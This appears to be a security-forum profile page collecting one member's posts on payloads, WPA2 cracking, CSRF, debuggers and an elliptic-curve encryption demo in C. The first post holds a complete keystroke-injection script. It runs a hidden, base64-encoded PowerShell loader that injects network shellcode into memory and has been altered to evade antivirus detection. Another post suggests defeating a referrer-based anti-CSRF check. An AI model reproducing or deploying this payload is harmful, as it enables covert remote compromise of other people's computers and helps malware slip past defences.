Jump to content


Active Members
  • Posts

  • Joined

  • Last visited

  • Days Won


Recent Profile Visitors

2,857 profile views

fugu's Achievements


Newbie (1/14)

  1. this is untested, but I rewrote the hashing that your exploit is using. instead of the ror13 hash that was being used, I changed it to ror12. on virustotal now, kaspersky is unable to detect it, but it could be cause I created a bug that I don't know about in the process, like I said, i haven't tested it. DELAY 5000 GUI r DELAY 1000 STRING cmd ENTER DELAY 1000 STRING powershell -nop -win hidden -noni -enc JE9VazAgPSAnJHpRRUMgPSAnJ1tEbGxJbXBvcnQoImtlcm5lbDMyLmRsbCIpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBWaXJ0dWFsQWxsb2MoSW50UHRyIGxwQWRkcmVzcywgdWludCBkd1NpemUsIHVpbnQgZmxBbGxvY2F0aW9uVHlwZSwgdWludCBmbFByb3RlY3QpO1tEbGxJbXBvcnQoImtlcm5lbDMyLmRsbCIpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBDcmVhdGVUaHJlYWQoSW50UHRyIGxwVGhyZWFkQXR0cmlidXRlcywgdWludCBkd1N0YWNrU2l6ZSwgSW50UHRyIGxwU3RhcnRBZGRyZXNzLCBJbnRQdHIgbHBQYXJhbWV0ZXIsIHVpbnQgZHdDcmVhdGlvbkZsYWdzLCBJbnRQdHIgbHBUaHJlYWRJZCk7W0RsbEltcG9ydCgibXN2Y3J0LmRsbCIpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBtZW1zZXQoSW50UHRyIGRlc3QsIHVpbnQgc3JjLCB1aW50IGNvdW50KTsnJzskdyA9IEFkZC1UeXBlIC1tZW1iZXJEZWZpbml0aW9uICR6UUVDIC1OYW1lICJXaW4zMiIgLW5hbWVzcGFjZSBXaW4zMkZ1bmN0aW9ucyAtcGFzc3RocnU7W0J5dGVbXV07W0J5dGVbXV0keiA9IDB4ZmMsMHhlOCwweDg5LDB4MDAsMHgwMCwweDAwLDB4NjAsMHg4OSwweGU1LDB4MzEsMHhkMiwweDY0LDB4OGIsMHg1MiwweDMwLDB4OGIsMHg1MiwweDBjLDB4OGIsMHg1MiwweDE0LDB4OGIsMHg3MiwweDI4LDB4MGYsMHhiNywweDRhLDB4MjYsMHgzMSwweGZmLDB4MzEsMHhjMCwweGFjLDB4M2MsMHg2MSwweDdjLDB4MDIsMHgyYywweDIwLDB4YzEsMHhjZiwweDBjLDB4MDEsMHhjNywweGUyLDB4ZjAsMHg1MiwweDU3LDB4OGIsMHg1MiwweDEwLDB4OGIsMHg0MiwweDNjLDB4MDEsMHhkMCwweDhiLDB4NDAsMHg3OCwweDg1LDB4YzAsMHg3NCwweDRhLDB4MDEsMHhkMCwweDUwLDB4OGIsMHg0OCwweDE4LDB4OGIsMHg1OCwweDIwLDB4MDEsMHhkMywweGUzLDB4NDksMHg4YiwweDM0LDB4OGIsMHgwMSwweGQ2LDB4MzEsMHhmZiwweDMxLDB4YzAsMHhhYywweGMxLDB4Y2YsMHgwYywweDAxLDB4YzcsMHgzOCwweGUwLDB4NzUsMHhmNCwweDAzLDB4N2QsMHhmOCwweDNiLDB4N2QsMHgyNCwweDc1LDB4ZTIsMHg1OCwweDhiLDB4NTgsMHgyNCwweDAxLDB4ZDMsMHg2NiwweDhiLDB4MGMsMHg0YiwweDhiLDB4NTgsMHgxYywweDAxLDB4ZDMsMHg4YiwweDA0LDB4OGIsMHgwMSwweGQwLDB4ODksMHg0NCwweDI0LDB4MjQsMHg1YiwweDViLDB4NjEsMHg1OSwweDVhLDB4NTEsMHhmZiwweGUwLDB4NTgsMHg1ZiwweDVhLDB4OGIsMHgxMiwweGViLDB4ODYsMHg1ZCwweDY4LDB4MzMsMHgzMiwweDAwLDB4MDAsMHg2OCwweDc3LDB4NzMsMHgzMiwweDVmLDB4NTQsMHg2OCwweDk2LDB4Y2UsMHhmMSwweDQ4LDB4ZmYsMHhkNSwweGI4LDB4OTAsMHgwMSwweDAwLDB4MDAsMHgyOSwweGM0LDB4NTQsMHg1MCwweDY4LDB4YzUsMHgzZiwweGIyLDB4ZDYsMHhmZiwweGQ1LDB4NTAsMHg1MCwweDUwLDB4NTAsMHg0MCwweDUwLDB4NDAsMHg1MCwweDY4LDB4ZTQsMHgzZSwweGJiLDB4ZGUsMHhmZiwweGQ1LDB4OTcsMHg2YSwweDA1LDB4NjgsMHhiMiwweDNlLDB4ZTksMHgwOSwweDY4LDB4MDIsMHgwMCwweDIwLDB4ZmIsMHg4OSwweGU2LDB4NmEsMHgxMCwweDU2LDB4NTcsMHg2OCwweDUzLDB4ZDcsMHhiZSwweGRjLDB4ZmYsMHhkNSwweDg1LDB4YzAsMHg3NCwweDBjLDB4ZmYsMHg0ZSwweDA4LDB4NzUsMHhlYywweDY4LDB4OGIsMHg0ZiwweDE2LDB4ZWMsMHhmZiwweGQ1LDB4NmEsMHgwMCwweDZhLDB4MDQsMHg1NiwweDU3LDB4NjgsMHg3MywweGEwLDB4ZGMsMHg2ZCwweGZmLDB4ZDUsMHg4YiwweDM2LDB4NmEsMHg0MCwweDY4LDB4MDAsMHgxMCwweDAwLDB4MDAsMHg1NiwweDZhLDB4MDAsMHg2OCwweGFlLDB4NTIsMHgyNiwweDk2LDB4ZmYsMHhkNSwweDkzLDB4NTMsMHg2YSwweDAwLDB4NTYsMHg1MywweDU3LDB4NjgsMHgwMiwweGQ5LDB4YzgsMHg1ZiwweGZmLDB4ZDUsMHgwMSwweGMzLDB4MjksMHhjNiwweDg1LDB4ZjYsMHg3NSwweGVjLDB4YzM7JGcgPSAweDEwMDA7aWYgKCR6Lkxlbmd0aCAtZ3QgMHgxMDAwKXskZyA9ICR6Lkxlbmd0aH07JEg4UUE9JHc6OlZpcnR1YWxBbGxvYygwLCRnLDB4MTAwMCwweDQwKTtmb3IgKCRpPTA7JGkgLWxlICgkei5MZW5ndGgtMSk7JGkrKykgeyR3OjptZW1zZXQoW0ludFB0cl0oJEg4UUEuVG9JbnQzMigpKyRpKSwgJHpbJGldLCAxKX07JHc6OkNyZWF0ZVRocmVhZCgwLDAsJEg4UUEsMCwwLDApO2ZvciAoOzspe1N0YXJ0LXNsZWVwIDYwfTsnOyRlID0gW1N5c3RlbS5Db252ZXJ0XTo6VG9CYXNlNjRTdHJpbmcoW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VW5pY29kZS5HZXRCeXRlcygkT1VrMCkpOyRDWEc3ID0gIi1lbmMgIjtpZihbSW50UHRyXTo6U2l6ZSAtZXEgOCl7JFRZNCA9ICRlbnY6U3lzdGVtUm9vdCArICJcc3lzd293NjRcV2luZG93c1Bvd2VyU2hlbGxcdjEuMFxwb3dlcnNoZWxsIjtpZXggIiYgJFRZNCAkQ1hHNyAkZSJ9ZWxzZXs7aWV4ICImIHBvd2Vyc2hlbGwgJENYRzcgJGUiO30K ENTER
  2. I know a really ugly way to do this, it kinda works but is going to throw some errors in the process. you create a .bat file like auto.bat: #/bin/sh goto label0 ./MacOSX_program exit 0 label0: .\Windows_program.exe The windows OS will see that the filename has a .bat extension. I doesn't know what #/bin/sh means so it throws an error, but continues on. It follows the goto the label0 and then runs the Windows_program.exe. The mac OS will ignore the .bat extension, but read #/bin/sh as a shell script. it will error on the goto, but continue on to run the MacOSX_program
  3. A while back I was looking into creating a program that would create a rainbowtables-like set of tables, that would handle WPA2/HMAC/SHA1 and I probably could have started making one, but the major problem with it is the keyspace size is way too large. This is referred to as Time Memory Trade Off, so the less time you want it to take, the more memory your tables are going to take up on the hard drive. For WPA2 the keyspace is going to be based on the PASSPHRASE that was used, plus SSID, plus a random number called the ANONCE, plus a random number called the SNONCE. even if you knew what the passphrase was, and you created a table for ssid and the 2 nonces, it would be really large. My thinking is that it would probably be impractical to create a full set tmto tables to completely crack wpa2.
  4. In many of the documents that I've been looking over, they talk about many of these things in terms of the mathematics, and I tend to see the same single letter variables being used over and over again. Some references will use different letters so its not always constant, but I was primarily going off of the site http://www.johannes-bauer.com/compsci/ecc/ for a majority of the concepts. The functions for point addition, point doubling, and scalar multiplication were pulled directly from "Implementation of Elliptic Curve Cryptography in C" by Kuldeep Bhardwaj and Sanjay Chaudhary, appendix A.
  5. So this is a little demo I've been working on that plays around with ECC Point Mathematics & encryption. Many of the demos I've found have been not functional from beginning to end, and although this is not going to be a secure version of ECC, it does demo some of the basic properties of it. I'm using pieces of existing code, along with my own to get it working. Individual ECC curve properties as well as the public key/private key pair can be created with openssl: CRYPTNAME=secp192k1 && openssl ecparam -name $CRYPTNAME -out $CRYPTNAME.pem && openssl ecparam -in $CRYPTNAME.pem -noout -text -C && openssl ecparam -in $CRYPTNAME.pem -genkey -noout -out $CRYPTNAME-key.pem && openssl ec -in $CRYPTNAME-key.pem -noout -text && rm -f $CRYPTNAME.pem $CRYPTNAME-key.pem In real ECIES, a common point is derived on both the senders end, as well as the receivers end, which is used to agree upon symmetric key. Normally something like AES is used to encrypt the message with this key, but I'm just xor'ing the message to keep the example small. Here it is: #include<stdio.h> #include<stdlib.h> #include<string.h> #include<gmp.h> #include<time.h> struct Point{ mpz_t x; mpz_t y; }; struct Elliptic_Curve{ mpz_t a; //y^2 = x^3 + a*x + b mpz_t b; mpz_t p; mpz_t n; //Order struct Point G; //Base Point mpz_t h; //Cofactor }; void Point_Addition(struct Elliptic_Curve EC, struct Point P,struct Point Q, struct Point *R); void Point_Doubling(struct Elliptic_Curve EC, struct Point P,struct Point *R); void Scalar_Multiplication(struct Elliptic_Curve EC, mpz_t m, struct Point P, struct Point *R); int main(int argc, char * argv[]){ srand(time(NULL)); //not crypto secure struct Elliptic_Curve secp192k1; mpz_init(secp192k1.a); mpz_init(secp192k1.b); mpz_init(secp192k1.p); mpz_init(secp192k1.n); mpz_init(secp192k1.G.x); mpz_init(secp192k1.G.y); mpz_init(secp192k1.h); mpz_set_str(secp192k1.a,"0", 16); //Elliptic Curve P-192 mpz_set_str(secp192k1.b,"3", 16); mpz_set_str(secp192k1.p,"FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFEFFFFEE37", 16); mpz_set_str(secp192k1.n,"FFFFFFFFFFFFFFFFFFFFFFFE26F2FC170F69466A74DEFD8D", 16); mpz_set_str(secp192k1.G.x,"DB4FF10EC057E9AE26B07D0280B7F4341DA5D1B1EAE06C7D", 16); mpz_set_str(secp192k1.G.y,"9B2F2F6D9C5628A7844163D015BE86344082AA88D95E2F9D", 16); mpz_set_str(secp192k1.h,"1", 16); mpz_t da; //priv struct Point Qa; //pub mpz_init(da); mpz_init(Qa.x); mpz_init(Qa.y); mpz_set_str(da, "e03a7a761dc3f4b5ff363906af1a1bfb97e1cbfc837834ed", 16); //private key, a random integer from "0" to "n" mpz_set_str(Qa.x,"8d4af03e8368921895af8c777fac221439604811d2359249", 16); //public key x mpz_set_str(Qa.y,"6f35647c10df80325be5cc48c5a2a218525db549d3d5839c", 16); //public key y mpz_t encoded_message; mpz_init(encoded_message); mpz_set_ui(encoded_message,0); unsigned char ary[] = "Hello World! 1234567890"; mpz_import(encoded_message, sizeof(ary), 1, sizeof(ary[0]), 1, 0, (const void *)ary); printf("#############################################################################\nary = %s\n", ary); struct Point R; mpz_init(R.x); mpz_init(R.y); struct Point S; mpz_init(S.x); mpz_init(S.y); mpz_t r; mpz_init(r); gmp_randstate_t state; gmp_randinit_mt(state); gmp_randseed_ui(state,rand()); mpz_urandomm(r,state,secp192k1.n); Scalar_Multiplication(secp192k1, r, secp192k1.G, &R); //R = r*G Scalar_Multiplication(secp192k1, r, Qa, &S); //S = r*Qa mpz_t e; mpz_init(e); mpz_xor(e,S.x,S.y); //My simplifed variant of the symmetric encryption part, not standard for real ECIES, probably insecure mpz_xor(e,e,encoded_message); //ciphertext = S.x ^ S.y ^ cleartext gmp_printf("Qa.x = %Zx //Point Qa is the PUBLIC_KEY\nQa.y = %Zx\n", Qa.x, Qa.y); gmp_printf("Ciphertext Message => Rx = %Zx //Point R is the CHOOSEN_POINT\nCiphertext Message => Ry = %Zx\n", R.x, R.y); gmp_printf("Ciphertext Message => e = %Zx\n", e); //Only Rx, Ry, and e get sent over the wire printf("Decrypt 'e' From da && R... //da is the PRIVATE_KEY\n"); struct Point newS; mpz_init(newS.x); mpz_init(newS.y); Scalar_Multiplication(secp192k1, da, R, &newS); mpz_t decoded_message; mpz_init(decoded_message); mpz_xor(decoded_message,newS.x,newS.y); mpz_xor(decoded_message,decoded_message,e); unsigned char *result = (unsigned char *)malloc(sizeof(unsigned char)*mpz_sizeinbase(decoded_message,8)); mpz_export(result, NULL, 1, sizeof(result[0]), 1, 0, decoded_message); printf("dec = %s\n\n", result); mpz_clear(secp192k1.a); mpz_clear(secp192k1.b); mpz_clear(secp192k1.p); mpz_clear(secp192k1.n); mpz_clear(secp192k1.G.x); mpz_clear(secp192k1.G.y); mpz_clear(secp192k1.h); mpz_clear(R.x); mpz_clear(R.y); mpz_clear(S.x); mpz_clear(S.y); mpz_clear(newS.x); mpz_clear(newS.y); mpz_clear(da); mpz_clear(e); mpz_clear(r); mpz_clear(encoded_message); mpz_clear(decoded_message); mpz_clear(Qa.x); mpz_clear(Qa.y); return 0; } void Point_Addition(struct Elliptic_Curve EC, struct Point P,struct Point Q,struct Point *R){ mpz_mod(P.x,P.x,EC.p); mpz_mod(P.y,P.y,EC.p); mpz_mod(Q.x,Q.x,EC.p); mpz_mod(Q.y,Q.y,EC.p); mpz_t temp,slope; mpz_init(temp); mpz_init_set_ui(slope,0); if(mpz_cmp_ui(P.x,0)==0 && mpz_cmp_ui(P.y,0)==0){ mpz_set(R->x,Q.x); mpz_set(R->y,Q.y); return; } if(mpz_cmp_ui(Q.x,0)==0 && mpz_cmp_ui(Q.y,0)==0){ mpz_set(R->x,P.x); mpz_set(R->y,P.y); return; } if(mpz_cmp_ui(Q.y,0)!=0){ mpz_sub(temp,EC.p,Q.y); mpz_mod(temp,temp,EC.p); }else mpz_set_ui(temp,0); if(mpz_cmp(P.y,temp)==0 && mpz_cmp(P.x,Q.x)==0){ mpz_set_ui(R->x,0); mpz_set_ui(R->y,0); return; } if(mpz_cmp(P.x,Q.x)==0 && mpz_cmp(P.y,Q.y)==0){ Point_Doubling(EC,P,R); return; }else{ mpz_sub(temp,P.x,Q.x); mpz_mod(temp,temp,EC.p); mpz_invert(temp,temp,EC.p); mpz_sub(slope,P.y,Q.y); mpz_mul(slope,slope,temp); mpz_mod(slope,slope,EC.p); mpz_mul(R->x,slope,slope); mpz_sub(R->x,R->x,P.x); mpz_sub(R->x,R->x,Q.x); mpz_mod(R->x,R->x,EC.p); mpz_sub(temp,P.x,R->x); mpz_mul(R->y,slope,temp); mpz_sub(R->y,R->y,P.y); mpz_mod(R->y,R->y,EC.p); return; } } void Point_Doubling(struct Elliptic_Curve EC, struct Point P,struct Point *R){ mpz_t slope,temp; mpz_init(temp); mpz_init(slope); if(mpz_cmp_ui(P.y,0)!=0){ mpz_mul_ui(temp,P.y,2); mpz_invert(temp,temp,EC.p); mpz_mul(slope,P.x,P.x); mpz_mul_ui(slope,slope,3); mpz_add(slope,slope,EC.a); mpz_mul(slope,slope,temp); mpz_mod(slope,slope,EC.p); mpz_mul(R->x,slope,slope); mpz_sub(R->x,R->x,P.x); mpz_sub(R->x,R->x,P.x); mpz_mod(R->x,R->x,EC.p); mpz_sub(temp,P.x,R->x); mpz_mul(R->y,slope,temp); mpz_sub(R->y,R->y,P.y); mpz_mod(R->y,R->y,EC.p); }else{ mpz_set_ui(R->x,0); mpz_set_ui(R->y,0); } } void Scalar_Multiplication(struct Elliptic_Curve EC, mpz_t m, struct Point P, struct Point *R){ struct Point Q,T; mpz_init(Q.x); mpz_init(Q.y); mpz_init(T.x); mpz_init(T.y); long no_of_bits,loop; no_of_bits=mpz_sizeinbase(m,2); mpz_set_ui(R->x,0); mpz_set_ui(R->y,0); if(mpz_cmp_ui(m,0)==0) return; mpz_set(Q.x,P.x); mpz_set(Q.y,P.y); if(mpz_tstbit(m,0)==1){ mpz_set(R->x,P.x); mpz_set(R->y,P.y); } for(loop=1;loop<no_of_bits;loop++){ mpz_set_ui(T.x,0); mpz_set_ui(T.y,0); Point_Doubling(EC,Q,&T); mpz_set(Q.x,T.x); mpz_set(Q.y,T.y); mpz_set(T.x,R->x); mpz_set(T.y,R->y); if(mpz_tstbit(m,loop)) Point_Addition(EC,T,Q,R); } }
  6. You can also try powershell.exe -command "Write-Host (New-Object System.Net.WebClient).DownloadString(\"http://diagnostic.opendns.com/myip\")"
  7. fugu

    anti-CSRF mesure

    https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)_Prevention_Cheat_Sheet I think this is the solution to that challenge, if I'm not mistaken.
  8. fugu

    anti-CSRF mesure

    doesn't ereg and eregi use regular expressions? If you have control of what will end up in the referrer field, couldn't you try and make the referrer a very widely encompassing regex like .* or something? I'm not sure the * is valid in the hostname location but maybe you can figure something out.
  9. The only way to know for sure what your external ip is (for the network your connected up to), is to send out a request and have the destination server tell you what your ip is. This has a lot of legitimate uses; NoScript's ABE uses this to help protect your browser. You might consider looking at dynamic dns as a solution to what your trying to do. There is software that is used on desktop machines to keep the external ip address of your home network associated with a dns entry, so that if you ever want to log into your home network when your away, you can just use your own dns to do so.
  10. fugu

    anti-CSRF mesure

    i don't know if you have the ability to modify the code, but if you can add echo "<pre><code>"; var_dump($_SERVER); echo "</code></pre>"; will let you examine all the various header entries that are stored in the $_SERVER variable during your request.
  11. Implementation of Elliptic Curve Cryptography in 'C' http://www.researchtrend.net/ijet32/6%20KULDEEP%20BHARDWAJ.pdf Elliptic Curve Cryptography: Algorithms and Implementation Analysis over Coordinate Systems http://www.researchgate.net/profile/Iskandar_Setiadi/publication/268688957_Elliptic_Curve_Cryptography_Algorithms_and_Implementation_Analysis_over_Coordinate_Systems/links/5474337a0cf29afed60f6340.pdf
  12. fugu


    I've heard the samsung S7 works even while pouring champagne on it.
  13. No problem:) There is a slightly better version of this at the Exploit DB www.exploit-db.com under shellcodes, which doesn't spam the log file or bog down the CPU.
  14. I've been looking for a new debugger for a while now. My previous debugger of choice for Windows was OllyDbg, which is the very first debugger I started with, but it's so outdated, and when I hop OS's (non-windows) it is not compatible. In Linux I tend to just use gdb, but its more designed for the command line, and it's nice to be able to look at the disassembled code, registers and stack all at the same time; imo it makes it easier to see whats going on. The debugger that looks most promising (to me) is IDA Pro, its available in multiple architectures, and i think it can even debug remotely to android devices. but its not foss, which is a bit of a let down. IDA Pro seem to ultimately be the way to go, but I was wondering if anyone knew of any open source alternatives to a multi-platform debugger?
  15. is it possible that someone nearby is using airbase-ng to create fake ap's?
  • Create New...